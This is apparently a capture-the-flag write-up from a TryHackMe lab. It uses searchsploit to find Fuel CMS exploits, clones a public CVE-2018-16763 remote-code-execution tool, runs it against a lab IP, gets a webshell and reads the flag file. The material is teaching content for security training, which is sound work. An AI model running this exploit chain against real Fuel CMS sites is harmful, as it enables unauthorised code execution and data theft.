Vulnerability Capstone

Web

{2D852A5A-E993-4321-8249-5AD7E44C0454}.png

Searchsploit

┌──(kali㉿kali)-[~]
└─$ searchsploit fuel
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
AMD Fuel Service - 'Fuel.service' Unquote  | windows/local/49535.txt
Franklin Fueling Systems  TS-550 - Exploit | hardware/remote/51321.txt
Franklin Fueling Systems Colibri Controlle | linux/remote/50861.txt
Franklin Fueling Systems TS-550 - Default  | hardware/remote/51382.txt
Franklin Fueling TS-550 evo 2.0.0.6833 - M | hardware/webapps/31180.txt
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3) | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injectio | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Auth | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Inj | php/webapps/48778.txt
Fuel CMS 1.5.0 - Cross-Site Request Forger | php/webapps/50884.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit

┌──(kali㉿kali)-[~/Documents]
└─$ git clone <https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE.git>
Cloning into 'CVE-2018-16763-FuelCMS-1.4.1-RCE'...
remote: Enumerating objects: 23, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 23 (delta 4), reused 22 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (23/23), 544.59 KiB | 2.13 MiB/s, done.
Resolving deltas: 100% (4/4), done.

┌──(kali㉿kali)-[~/Documents/CVE-2018-16763-FuelCMS-1.4.1-RCE]
└─$ python3 console.py -t 10.201.39.33
CVE-2018-16763-FuelCMS-1.4.1-RCE - by Remi GASCOU (Podalirius)

[+] Shell was uploaded in <http://10.201.39.33/9b6e416e57d4496eb8b2e9770a403e9f.php>
[webshell]> ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var

[webshell]> cat home/ubuntu/flag.txt
THM{ACKME_BLOG_HACKED}